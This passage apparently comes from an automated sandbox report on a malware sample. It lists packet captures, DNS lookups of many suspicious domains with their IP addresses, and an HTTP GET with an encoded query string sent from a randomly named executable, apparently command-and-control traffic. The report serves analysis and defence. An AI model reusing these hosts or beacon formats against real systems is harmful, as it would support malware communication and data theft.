                                                                                                                      Dec 7, 2023 15:55:28.361023903 CET4974980192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:28.536798000 CET804974984.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:28.536823988 CET804974984.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:30.887398005 CET4975080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:31.063823938 CET804975084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:31.063994884 CET4975080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:31.064364910 CET4975080192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:31.240565062 CET804975084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:31.240711927 CET804975084.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.590915918 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.767149925 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.767292023 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.767606020 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.943882942 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944278955 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944351912 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944453955 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944474936 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.944566965 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944622040 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944637060 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.944742918 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944786072 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944819927 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.944889069 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944904089 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:33.944962978 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.944988966 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:33.945177078 CET4975180192.168.2.1184.32.84.32
                                                                                                                      Dec 7, 2023 15:55:34.123743057 CET804975184.32.84.32192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:39.120949984 CET4975280192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:39.278587103 CET8049752208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:39.278749943 CET4975280192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:39.278970957 CET4975280192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:39.436939955 CET8049752208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:41.809894085 CET4975380192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:41.968298912 CET8049753208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:41.968544006 CET4975380192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:41.969367027 CET4975380192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:42.127650976 CET8049753208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:44.497668982 CET4975480192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:44.658802032 CET8049754208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:44.659074068 CET4975480192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:44.659178972 CET4975480192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:44.820641041 CET8049754208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.185290098 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.345520973 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.345704079 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.345930099 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.551954031 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871211052 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871524096 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871592045 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871644974 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871711969 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871726036 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.871726990 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.871772051 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.871822119 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:47.915530920 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:47.965262890 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.031882048 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.032021046 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.032059908 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.032099009 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.032188892 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.032356024 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.125488043 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.125524044 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.125801086 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.192375898 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.192404032 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.192456961 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.192521095 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.192598104 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.192631006 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.285758018 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.285784006 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:48.285958052 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.286190987 CET4975580192.168.2.11208.91.197.27
                                                                                                                      Dec 7, 2023 15:55:48.446093082 CET8049755208.91.197.27192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:01.714448929 CET4975680192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:01.887953997 CET8049756144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:01.888236046 CET4975680192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:01.888638020 CET4975680192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:02.058042049 CET8049756144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:02.235359907 CET8049756144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:02.235392094 CET8049756144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:02.235466957 CET4975680192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:03.402775049 CET4975680192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:04.418740034 CET4975780192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:04.588356018 CET8049757144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:04.588500977 CET4975780192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:04.588737011 CET4975780192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:04.757849932 CET8049757144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:04.766851902 CET8049757144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:04.766895056 CET8049757144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:04.766963005 CET4975780192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:06.122590065 CET4975780192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:07.228640079 CET4975880192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:07.397672892 CET8049758144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:07.398020029 CET4975880192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:07.635206938 CET4975880192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:07.805130959 CET8049758144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:07.805253983 CET8049758144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:07.817433119 CET8049758144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:07.817512989 CET8049758144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:07.817723036 CET4975880192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:09.137093067 CET4975880192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.153090000 CET4975980192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.322101116 CET8049759144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:10.322241068 CET4975980192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.322566032 CET4975980192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.491158962 CET8049759144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:10.500169992 CET8049759144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:10.500200033 CET8049759144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:10.500345945 CET4975980192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.500472069 CET4975980192.168.2.11144.217.103.3
                                                                                                                      Dec 7, 2023 15:56:10.669018030 CET8049759144.217.103.3192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:17.408543110 CET4976080192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:17.761681080 CET8049760103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:17.761754990 CET4976080192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:17.762079000 CET4976080192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:18.115834951 CET8049760103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:18.115858078 CET8049760103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:18.115912914 CET4976080192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:19.277800083 CET4976080192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:19.631084919 CET8049760103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:20.293728113 CET4976180192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:20.648430109 CET8049761103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:20.648541927 CET4976180192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:20.648746967 CET4976180192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:21.003448009 CET8049761103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:21.003468037 CET8049761103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:21.003547907 CET4976180192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:22.152674913 CET4976180192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:22.507133961 CET8049761103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:23.168893099 CET4976280192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:23.544367075 CET8049762103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:23.547815084 CET4976280192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:23.548203945 CET4976280192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:23.923084021 CET8049762103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:23.923125982 CET8049762103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:26.075037956 CET4976380192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:26.430541039 CET8049763103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:26.430623055 CET4976380192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:26.880600929 CET4976380192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:27.252439022 CET8049763103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:27.948144913 CET8049763103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:27.951179028 CET4976380192.168.2.11103.120.80.111
                                                                                                                      Dec 7, 2023 15:56:30.082143068 CET8049763103.120.80.111192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:30.136892080 CET4976380192.168.2.11103.120.80.111

                                                                                                                      UDP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 7, 2023 15:52:46.871187925 CET5995253192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:52:47.304883957 CET53599521.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:02.764329910 CET5278053192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:53:03.762908936 CET5278053192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:53:03.852314949 CET53527801.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:03.888762951 CET53527801.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:19.169123888 CET6196353192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:53:19.409032106 CET53619631.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:34.888459921 CET6420953192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:53:35.297214985 CET53642091.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:48.997361898 CET5046253192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:53:49.422846079 CET53504621.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:03.435661077 CET4918653192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:04.434406042 CET4918653192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:04.564275026 CET53491861.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:04.564301968 CET53491861.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:12.622395039 CET5999453192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:13.621910095 CET5999453192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:13.632445097 CET53599941.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:13.747313023 CET53599941.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:28.562007904 CET6104153192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:28.851614952 CET53610411.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:42.934729099 CET6411753192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:43.902667046 CET53641171.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:54:57.373146057 CET5931853192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:54:57.686295986 CET53593181.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:11.248482943 CET6077853192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:55:11.381314993 CET53607781.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:25.028739929 CET6004853192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:55:25.476052046 CET53600481.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:38.950531960 CET6444653192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:55:39.119580030 CET53644461.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:55:53.295403004 CET6121553192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:55:53.424830914 CET53612151.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:01.484379053 CET6028853192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:01.713165998 CET53602881.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:15.513067007 CET6209953192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:16.512427092 CET6209953192.168.2.111.1.1.1
                                                                                                                      Dec 7, 2023 15:56:17.407413006 CET53620991.1.1.1192.168.2.11
                                                                                                                      Dec 7, 2023 15:56:17.407438040 CET53620991.1.1.1192.168.2.11

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 7, 2023 15:52:46.871187925 CET192.168.2.111.1.1.10x5709Standard query (0)www.ozzventures.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:02.764329910 CET192.168.2.111.1.1.10xabccStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:03.762908936 CET192.168.2.111.1.1.10xabccStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:19.169123888 CET192.168.2.111.1.1.10x25a2Standard query (0)www.porousworld.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:34.888459921 CET192.168.2.111.1.1.10xc24fStandard query (0)www.greenharbor.infoA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:48.997361898 CET192.168.2.111.1.1.10x632Standard query (0)www.lets-room.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:03.435661077 CET192.168.2.111.1.1.10xb3c7Standard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:04.434406042 CET192.168.2.111.1.1.10xb3c7Standard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:12.622395039 CET192.168.2.111.1.1.10x2abbStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:13.621910095 CET192.168.2.111.1.1.10x2abbStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:28.562007904 CET192.168.2.111.1.1.10x372eStandard query (0)www.medical-loan24.liveA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:42.934729099 CET192.168.2.111.1.1.10xfaa0Standard query (0)www.speedbikesglobal.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:57.373146057 CET192.168.2.111.1.1.10x974bStandard query (0)www.belaflorloja.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:11.248482943 CET192.168.2.111.1.1.10x7b61Standard query (0)www.blessingstation.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:25.028739929 CET192.168.2.111.1.1.10xc1ceStandard query (0)www.cjjmobbbshhhu.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:38.950531960 CET192.168.2.111.1.1.10x574fStandard query (0)www.hillcresthealth.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:53.295403004 CET192.168.2.111.1.1.10x1dd0Standard query (0)www.zbbqis.storeA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:01.484379053 CET192.168.2.111.1.1.10xd3deStandard query (0)www.hmoatl.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:15.513067007 CET192.168.2.111.1.1.10xda1dStandard query (0)www.633922.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:16.512427092 CET192.168.2.111.1.1.10xda1dStandard query (0)www.633922.comA (IP address)IN (0x0001)false

                                                                                                                      DNS Answers

                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 7, 2023 15:52:47.304883957 CET1.1.1.1192.168.2.110x5709No error (0)www.ozzventures.shopozzventures.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:52:47.304883957 CET1.1.1.1192.168.2.110x5709No error (0)ozzventures.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:03.852314949 CET1.1.1.1192.168.2.110xabccNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:03.852314949 CET1.1.1.1192.168.2.110xabccNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:03.888762951 CET1.1.1.1192.168.2.110xabccNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:03.888762951 CET1.1.1.1192.168.2.110xabccNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:19.409032106 CET1.1.1.1192.168.2.110x25a2No error (0)www.porousworld.comporousworld.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:19.409032106 CET1.1.1.1192.168.2.110x25a2No error (0)porousworld.com173.231.241.132A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:35.297214985 CET1.1.1.1192.168.2.110xc24fNo error (0)www.greenharbor.info69.57.161.215A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:53:49.422846079 CET1.1.1.1192.168.2.110x632No error (0)www.lets-room.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:04.564275026 CET1.1.1.1192.168.2.110xb3c7Server failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:04.564301968 CET1.1.1.1192.168.2.110xb3c7Server failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:13.632445097 CET1.1.1.1192.168.2.110x2abbNo error (0)www.sorenad.comsorenad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:13.632445097 CET1.1.1.1192.168.2.110x2abbNo error (0)sorenad.com217.144.107.2A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:13.747313023 CET1.1.1.1192.168.2.110x2abbNo error (0)www.sorenad.comsorenad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:13.747313023 CET1.1.1.1192.168.2.110x2abbNo error (0)sorenad.com217.144.107.2A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:28.851614952 CET1.1.1.1192.168.2.110x372eNo error (0)www.medical-loan24.live64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:43.902667046 CET1.1.1.1192.168.2.110xfaa0No error (0)www.speedbikesglobal.comspeedbikesglobal.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:43.902667046 CET1.1.1.1192.168.2.110xfaa0No error (0)speedbikesglobal.com207.244.126.150A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:57.686295986 CET1.1.1.1192.168.2.110x974bNo error (0)www.belaflorloja.onlinebelaflorloja.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:54:57.686295986 CET1.1.1.1192.168.2.110x974bNo error (0)belaflorloja.online162.240.81.18A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:11.381314993 CET1.1.1.1192.168.2.110x7b61No error (0)www.blessingstation.orgblessingstation.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:11.381314993 CET1.1.1.1192.168.2.110x7b61No error (0)blessingstation.org68.178.195.71A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:25.476052046 CET1.1.1.1192.168.2.110xc1ceNo error (0)www.cjjmobbbshhhu.shopcjjmobbbshhhu.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:25.476052046 CET1.1.1.1192.168.2.110xc1ceNo error (0)cjjmobbbshhhu.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:39.119580030 CET1.1.1.1192.168.2.110x574fNo error (0)www.hillcresthealth.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:55:53.424830914 CET1.1.1.1192.168.2.110x1dd0Name error (3)www.zbbqis.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:01.713165998 CET1.1.1.1192.168.2.110xd3deNo error (0)www.hmoatl.comhmoatl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:01.713165998 CET1.1.1.1192.168.2.110xd3deNo error (0)hmoatl.com144.217.103.3A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:17.407413006 CET1.1.1.1192.168.2.110xda1dNo error (0)www.633922.com103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 15:56:17.407438040 CET1.1.1.1192.168.2.110xda1dNo error (0)www.633922.com103.120.80.111A (IP address)IN (0x0001)false

                                                                                                                      HTTP Request Dependency Graph

                                                                                                                      • www.ozzventures.shop
                                                                                                                      • www.fortunetravelsltd.com
                                                                                                                      • www.porousworld.com
                                                                                                                      • www.greenharbor.info
                                                                                                                      • www.lets-room.online
                                                                                                                      • www.sorenad.com
                                                                                                                      • www.medical-loan24.live
                                                                                                                      • www.speedbikesglobal.com
                                                                                                                      • www.belaflorloja.online
                                                                                                                      • www.blessingstation.org
                                                                                                                      • www.cjjmobbbshhhu.shop
                                                                                                                      • www.hillcresthealth.online
                                                                                                                      • www.hmoatl.com
                                                                                                                      • www.633922.com

                                                                                                                      HTTP Packets

                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.114971084.32.84.32802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:52:47.492466927 CET443OUTGET /m858/?GJ=C4IdWhJXSFOXR8D&yRV=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB064navYR89b2jcsA== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.ozzventures.shop
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:52:47.668746948 CET1286INHTTP/1.1 200 OK
                                                                                                                      Server: hcdn
                                                                                                                      Date: Thu, 07 Dec 2023 14:52:47 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 10066
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      x-hcdn-request-id: 0ce39aac04a2fe7c103429ab1c196754-phx-edge1
                                                                                                                      Expires: Thu, 07 Dec 2023 14:52:46 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-Ranges: bytes
